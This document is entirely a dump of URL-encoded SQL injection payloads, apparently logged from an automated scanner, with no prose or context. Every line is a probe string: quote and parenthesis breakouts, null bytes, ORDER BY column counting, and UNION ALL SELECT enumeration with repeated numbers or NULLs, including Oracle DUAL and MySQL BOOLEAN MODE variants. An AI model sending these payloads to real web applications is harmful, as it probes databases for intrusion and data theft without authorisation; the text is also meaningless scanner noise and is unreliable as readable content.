-2795%00%27%20UNION%20ALL%20SELECT%205564%2C5564%2C5564%2C5564%2C5564%2C5564--%20 -9016%00%27%20UNION%20ALL%20SELECT%204938%2C4938%2C4938%2C4938%2C4938%2C4938%2C4938--%20 -6024%00%27%20UNION%20ALL%20SELECT%209832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832%2C9832--%20 -6227%00%27%20UNION%20ALL%20SELECT%204762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762--%20 -5534%00%27%20UNION%20ALL%20SELECT%205802%2C5802%2C5802%2C5802%2C5802%2C5802%2C5802%2C5802%2C5802%2C5802--%20 -6252%27%29%20WHERE%205682%3D5682%20ORDER%20BY%201--%20 -7620%27%29%20WHERE%205418%3D5418%20ORDER%20BY%208096--%20 -7103%27%29%20WHERE%207118%3D7118%20UNION%20ALL%20SELECT%207118--%20 -4883%27%29%20WHERE%204347%3D4347%20UNION%20ALL%20SELECT%204347%2C4347--%20 -9760%27%29%20WHERE%203897%3D3897%20UNION%20ALL%20SELECT%203897%2C3897%2C3897--%20 -4744%27%29%20WHERE%203302%3D3302%20UNION%20ALL%20SELECT%203302%2C3302%2C3302%2C3302--%20 -3246%27%29%20WHERE%205635%3D5635%20UNION%20ALL%20SELECT%205635%2C5635%2C5635%2C5635%2C5635--%20 -3222%27%29%20WHERE%205815%3D5815%20UNION%20ALL%20SELECT%205815%2C5815%2C5815%2C5815%2C5815%2C5815--%20 -8072%27%29%20WHERE%202150%3D2150%20UNION%20ALL%20SELECT%202150%2C2150%2C2150%2C2150%2C2150%2C2150%2C2150--%20 -7975%27%29%20WHERE%202271%3D2271%20UNION%20ALL%20SELECT%202271%2C2271%2C2271%2C2271%2C2271%2C2271%2C2271%2C2271--%20 -3683%27%29%20WHERE%207480%3D7480%20UNION%20ALL%20SELECT%207480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480--%20 -9108%27%29%20WHERE%205687%3D5687%20UNION%20ALL%20SELECT%205687%2C5687%2C5687%2C5687%2C5687%2C5687%2C5687%2C5687%2C5687%2C5687--%20 -5556%22%29%20WHERE%209234%3D9234%20ORDER%20BY%201--%20 -3797%22%29%20WHERE%208211%3D8211%20ORDER%20BY%203455--%20 -4216%22%29%20WHERE%203617%3D3617%20UNION%20ALL%20SELECT%203617--%20 -6294%22%29%20WHERE%205319%3D5319%20UNION%20ALL%20SELECT%205319%2C5319--%20 -4180%22%29%20WHERE%208836%3D8836%20UNION%20ALL%20SELECT%208836%2C8836%2C8836--%20 -9160%22%29%20WHERE%205708%3D5708%20UNION%20ALL%20SELECT%205708%2C5708%2C5708%2C5708--%20 -1814%22%29%20WHERE%203074%3D3074%20UNION%20ALL%20SELECT%203074%2C3074%2C3074%2C3074%2C3074--%20 -4396%22%29%20WHERE%204855%3D4855%20UNION%20ALL%20SELECT%204855%2C4855%2C4855%2C4855%2C4855%2C4855--%20 -6721%22%29%20WHERE%207808%3D7808%20UNION%20ALL%20SELECT%207808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808--%20 -2168%22%29%20WHERE%206628%3D6628%20UNION%20ALL%20SELECT%206628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628%2C6628--%20 -6306%22%29%20WHERE%201128%3D1128%20UNION%20ALL%20SELECT%201128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128%2C1128--%20 -4128%22%29%20WHERE%206451%3D6451%20UNION%20ALL%20SELECT%206451%2C6451%2C6451%2C6451%2C6451%2C6451%2C6451%2C6451%2C6451%2C6451--%20 -9696%27%20WHERE%208592%3D8592%20ORDER%20BY%201--%20 -3055%27%20WHERE%209680%3D9680%20ORDER%20BY%202411--%20 -1939%27%20WHERE%208987%3D8987%20UNION%20ALL%20SELECT%208987--%20 -8515%27%20WHERE%201063%3D1063%20UNION%20ALL%20SELECT%201063%2C1063--%20 -4318%27%20WHERE%209522%3D9522%20UNION%20ALL%20SELECT%209522%2C9522%2C9522--%20 -6392%27%20WHERE%206783%3D6783%20UNION%20ALL%20SELECT%206783%2C6783%2C6783%2C6783--%20 -2922%27%20WHERE%202034%3D2034%20UNION%20ALL%20SELECT%202034%2C2034%2C2034%2C2034%2C2034--%20 -7730%27%20WHERE%201900%3D1900%20UNION%20ALL%20SELECT%201900%2C1900%2C1900%2C1900%2C1900%2C1900--%20 -8516%27%20WHERE%204234%3D4234%20UNION%20ALL%20SELECT%204234%2C4234%2C4234%2C4234%2C4234%2C4234%2C4234--%20 -9208%27%20WHERE%201507%3D1507%20UNION%20ALL%20SELECT%201507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507%2C1507--%20 -8840%27%20WHERE%206537%3D6537%20UNION%20ALL%20SELECT%206537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537%2C6537--%20 -5642%27%20WHERE%203338%3D3338%20UNION%20ALL%20SELECT%203338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338--%20 -5433%22%20WHERE%203381%3D3381%20ORDER%20BY%201--%20 -4522%22%20WHERE%201526%3D1526%20ORDER%20BY%208822--%20 -6339%22%20WHERE%208628%3D8628%20UNION%20ALL%20SELECT%208628--%20 -8701%22%20WHERE%208544%3D8544%20UNION%20ALL%20SELECT%208544%2C8544--%20 -1162%22%20WHERE%202784%3D2784%20UNION%20ALL%20SELECT%202784%2C2784%2C2784--%20 -1208%22%20WHERE%206084%3D6084%20UNION%20ALL%20SELECT%206084%2C6084%2C6084%2C6084--%20 -7709%22%20WHERE%207787%3D7787%20UNION%20ALL%20SELECT%207787%2C7787%2C7787%2C7787%2C7787--%20 -2572%22%20WHERE%205909%3D5909%20UNION%20ALL%20SELECT%205909%2C5909%2C5909%2C5909%2C5909%2C5909--%20 -5325%22%20WHERE%205170%3D5170%20UNION%20ALL%20SELECT%205170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170--%20 -2710%22%20WHERE%209302%3D9302%20UNION%20ALL%20SELECT%209302%2C9302%2C9302%2C9302%2C9302%2C9302%2C9302%2C9302--%20 -4901%22%20WHERE%207907%3D7907%20UNION%20ALL%20SELECT%207907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907--%20 -2563%22%20WHERE%207198%3D7198%20UNION%20ALL%20SELECT%207198%2C7198%2C7198%2C7198%2C7198%2C7198%2C7198%2C7198%2C7198%2C7198--%20 -9364%27%7C%7C%28SELECT%20%27AXkW%27%20FROM%20DUAL%20WHERE%202306%3D2306%20ORDER%20BY%201--%20 -3379%27%7C%7C%28SELECT%20%27tCZr%27%20FROM%20DUAL%20WHERE%204846%3D4846%20ORDER%20BY%202333--%20 -9037%27%7C%7C%28SELECT%20%27IRML%27%20FROM%20DUAL%20WHERE%203154%3D3154%20UNION%20ALL%20SELECT%203154--%20 -7471%27%7C%7C%28SELECT%20%27BnuE%27%20FROM%20DUAL%20WHERE%206011%3D6011%20UNION%20ALL%20SELECT%206011%2C6011--%20 -4543%27%7C%7C%28SELECT%20%27WRiv%27%20FROM%20DUAL%20WHERE%207565%3D7565%20UNION%20ALL%20SELECT%207565%2C7565%2C7565--%20 -6052%27%7C%7C%28SELECT%20%27cJBB%27%20FROM%20DUAL%20WHERE%208184%3D8184%20UNION%20ALL%20SELECT%208184%2C8184%2C8184%2C8184--%20 -5631%27%7C%7C%28SELECT%20%27nyjv%27%20FROM%20DUAL%20WHERE%206820%3D6820%20UNION%20ALL%20SELECT%206820%2C6820%2C6820%2C6820%2C6820--%20 -2058%27%7C%7C%28SELECT%20%27yTkT%27%20FROM%20DUAL%20WHERE%208214%3D8214%20UNION%20ALL%20SELECT%208214%2C8214%2C8214%2C8214%2C8214%2C8214--%20 -2477%27%7C%7C%28SELECT%20%27Ndae%27%20FROM%20DUAL%20WHERE%205396%3D5396%20UNION%20ALL%20SELECT%205396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396--%20 -9449%27%7C%7C%28SELECT%20%27dhDY%27%20FROM%20DUAL%20WHERE%201534%3D1534%20UNION%20ALL%20SELECT%201534%2C1534%2C1534%2C1534%2C1534%2C1534%2C1534%2C1534--%20 -5630%27%7C%7C%28SELECT%20%27BjCE%27%20FROM%20DUAL%20WHERE%204022%3D4022%20UNION%20ALL%20SELECT%204022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022%2C4022--%20 -1068%27%7C%7C%28SELECT%20%27Wrsw%27%20FROM%20DUAL%20WHERE%205490%3D5490%20UNION%20ALL%20SELECT%205490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490--%20 -3479%27%7C%7C%28SELECT%20%27edLJ%27%20WHERE%202546%3D2546%20ORDER%20BY%201--%20 -1662%27%7C%7C%28SELECT%20%27FTos%27%20WHERE%208313%3D8313%20ORDER%20BY%209215--%20 -6671%27%7C%7C%28SELECT%20%27NjiH%27%20WHERE%204883%3D4883%20UNION%20ALL%20SELECT%204883--%20 -1609%27%7C%7C%28SELECT%20%27heDS%27%20WHERE%206879%3D6879%20UNION%20ALL%20SELECT%206879%2C6879--%20 -7353%27%7C%7C%28SELECT%20%27Brza%27%20WHERE%209706%3D9706%20UNION%20ALL%20SELECT%209706%2C9706%2C9706--%20 -8377%27%7C%7C%28SELECT%20%27HPAS%27%20WHERE%205887%3D5887%20UNION%20ALL%20SELECT%205887%2C5887%2C5887%2C5887--%20 -5110%27%7C%7C%28SELECT%20%27PRQw%27%20WHERE%205780%3D5780%20UNION%20ALL%20SELECT%205780%2C5780%2C5780%2C5780%2C5780--%20 -6080%27%7C%7C%28SELECT%20%27nFmZ%27%20WHERE%209512%3D9512%20UNION%20ALL%20SELECT%209512%2C9512%2C9512%2C9512%2C9512%2C9512--%20 -3486%27%7C%7C%28SELECT%20%27TDxI%27%20WHERE%204351%3D4351%20UNION%20ALL%20SELECT%204351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351--%20 -3491%27%7C%7C%28SELECT%20%27QoPW%27%20WHERE%208046%3D8046%20UNION%20ALL%20SELECT%208046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046--%20 -6490%27%7C%7C%28SELECT%20%27cFuL%27%20WHERE%203078%3D3078%20UNION%20ALL%20SELECT%203078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078--%20 -9472%27%7C%7C%28SELECT%20%27NIKo%27%20WHERE%204053%3D4053%20UNION%20ALL%20SELECT%204053%2C4053%2C4053%2C4053%2C4053%2C4053%2C4053%2C4053%2C4053%2C4053--%20 -4296%27%2B%28SELECT%20VmZg%20WHERE%205714%3D5714%20ORDER%20BY%201--%20 -8460%27%2B%28SELECT%20VRNK%20WHERE%209414%3D9414%20ORDER%20BY%201314--%20 -6785%27%2B%28SELECT%20qCAy%20WHERE%203942%3D3942%20UNION%20ALL%20SELECT%203942--%20 -2669%27%2B%28SELECT%20kOmE%20WHERE%209535%3D9535%20UNION%20ALL%20SELECT%209535%2C9535--%20 -6492%27%2B%28SELECT%20tRoK%20WHERE%201843%3D1843%20UNION%20ALL%20SELECT%201843%2C1843%2C1843--%20 -1629%27%2B%28SELECT%20ZjmE%20WHERE%205643%3D5643%20UNION%20ALL%20SELECT%205643%2C5643%2C5643%2C5643--%20 -9098%27%2B%28SELECT%20GHBP%20WHERE%209125%3D9125%20UNION%20ALL%20SELECT%209125%2C9125%2C9125%2C9125%2C9125--%20 -5151%27%2B%28SELECT%20HMNI%20WHERE%209060%3D9060%20UNION%20ALL%20SELECT%209060%2C9060%2C9060%2C9060%2C9060%2C9060--%20 -9421%27%2B%28SELECT%20GXup%20WHERE%209180%3D9180%20UNION%20ALL%20SELECT%209180%2C9180%2C9180%2C9180%2C9180%2C9180%2C9180--%20 -7788%27%2B%28SELECT%20lsjJ%20WHERE%202758%3D2758%20UNION%20ALL%20SELECT%202758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758--%20 -2490%27%2B%28SELECT%20FOjb%20WHERE%208569%3D8569%20UNION%20ALL%20SELECT%208569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569%2C8569--%20 -7427%27%2B%28SELECT%20PpJm%20WHERE%204533%3D4533%20UNION%20ALL%20SELECT%204533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533%2C4533--%20 -1455%27%2B%28SELECT%20%27FEqb%27%20WHERE%202177%3D2177%20ORDER%20BY%201--%20 -3768%27%2B%28SELECT%20%27hfRt%27%20WHERE%207025%3D7025%20ORDER%20BY%201769--%20 -5059%27%2B%28SELECT%20%27vLap%27%20WHERE%207564%3D7564%20UNION%20ALL%20SELECT%207564--%20 -9300%27%2B%28SELECT%20%27tvET%27%20WHERE%203034%3D3034%20UNION%20ALL%20SELECT%203034%2C3034--%20 -4700%27%2B%28SELECT%20%27JUpE%27%20WHERE%201735%3D1735%20UNION%20ALL%20SELECT%201735%2C1735%2C1735--%20 -3076%27%2B%28SELECT%20%27VJKq%27%20WHERE%204858%3D4858%20UNION%20ALL%20SELECT%204858%2C4858%2C4858%2C4858--%20 -8102%27%2B%28SELECT%20%27xXIg%27%20WHERE%205084%3D5084%20UNION%20ALL%20SELECT%205084%2C5084%2C5084%2C5084%2C5084--%20 -9999%27%2B%28SELECT%20%27xWGn%27%20WHERE%204254%3D4254%20UNION%20ALL%20SELECT%204254%2C4254%2C4254%2C4254%2C4254%2C4254--%20 -7756%27%2B%28SELECT%20%27mlLZ%27%20WHERE%206324%3D6324%20UNION%20ALL%20SELECT%206324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324--%20 -6255%27%2B%28SELECT%20%27dMJx%27%20WHERE%204892%3D4892%20UNION%20ALL%20SELECT%204892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892--%20 -7429%27%2B%28SELECT%20%27jlRa%27%20WHERE%209863%3D9863%20UNION%20ALL%20SELECT%209863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863--%20 -4458%27%2B%28SELECT%20%27dNDH%27%20WHERE%205429%3D5429%20UNION%20ALL%20SELECT%205429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429--%20 -3472%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20 -1620%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%208115--%20 -6422%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204844--%20 -4161%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206531%2C6531--%20 -4953%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201045%2C1045%2C1045--%20 -3857%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204121%2C4121%2C4121%2C4121--%20 -1417%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206101%2C6101%2C6101%2C6101%2C6101--%20 -8122%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202689%2C2689%2C2689%2C2689%2C2689%2C2689--%20 -9093%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641--%20 -3742%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490--%20 -8986%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363--%20 -1807%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201948%2C1948%2C1948%2C1948%2C1948%2C1948%2C1948%2C1948%2C1948%2C1948--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%207177%3D7177%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%202317%3D2317%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%204241%3D4241%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%208825%3D8825%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203690%3D3690%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%201881%3D1881%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%206161%3D6161%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%204851%3D4851%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%206358%3D6358%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 